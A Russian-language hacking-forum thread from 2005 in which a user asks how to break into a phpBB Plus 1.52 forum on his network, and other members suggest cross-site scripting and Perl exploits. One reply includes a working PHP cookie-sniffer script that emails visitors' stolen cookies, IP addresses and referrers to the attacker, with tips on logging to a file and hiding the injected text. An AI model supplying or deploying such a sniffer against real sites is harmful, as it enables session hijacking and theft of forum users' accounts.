Форумы Взлом PHPBB Plus

Discussion in 'Уязвимости CMS/форумов' started by cardons, 4 Dec 2005.

  1. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Подскажите как его ломануть очень надо.По XSS нейподет этот сайт у меня в сети.
     
  2. DeathLess

    DeathLess New Member

    Joined:
    21 Oct 2005
    Messages:
    11
    Likes Received:
    2
    Reputations:
    1
    Почему это XSS непойдет? Главное понимать принципы. Если это web-чат то ничего тебе не мешает использовать там xss.
     
    #2 DeathLess, 4 Dec 2005
    Last edited: 4 Dec 2005
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    DeathLess какой веб чат?? это пхпбб форум
    cardons, пробуй хсс , перл сплойты ( но лучший и рабочий вариант ХСС , если не конечно не самая последняя версия форума)
     
  4. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    ну, во-первых, кросс-сайт-скриптинг не тока в интернете работает), ты же можешь прям в сети сниффер разместить у себя на хосте, что к сожалению при обнаружении атаки плохо отразится на твоей безопасности...

    -простейший сниффер:
    Code:
    <?
    if(isset($QUERY_STRING))
    {
    $date=date('d.m.y : H:i:s');
    mail("[email protected], [email protected]", "Kyka npuIIIJIa", "Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING");
    }
    ?>
    
    - правда лучше сделай чтобы в файл писалось, чтобы не заморачиваться с мэйл серваками... (мануалы по php или перлу ищи на emanual.ru)

    Во-вторых, насколько я понял, это все тот же форум phpbb, а вовсе не чат, но так и не нашел ответа, отличается ли он чем-нить от простого? (без плюса)

    В третьих, не верится, что существует лишь одна рабочая версия этого форума, так что плз, пиши сюда нам версию, либо сам смотри на сайтах http://www.security.nnov.ru/
    http://securitylab.ru/
     
  5. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Версия 1.52.Cплойтов у меня нету нифига.Щас доделаю сниф тока что писать как для простого phpbb?Просто подскажите что писать чтоб небыло видно этого текста.
     
  6. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    найди похожую системку в инете, ковыряться надо...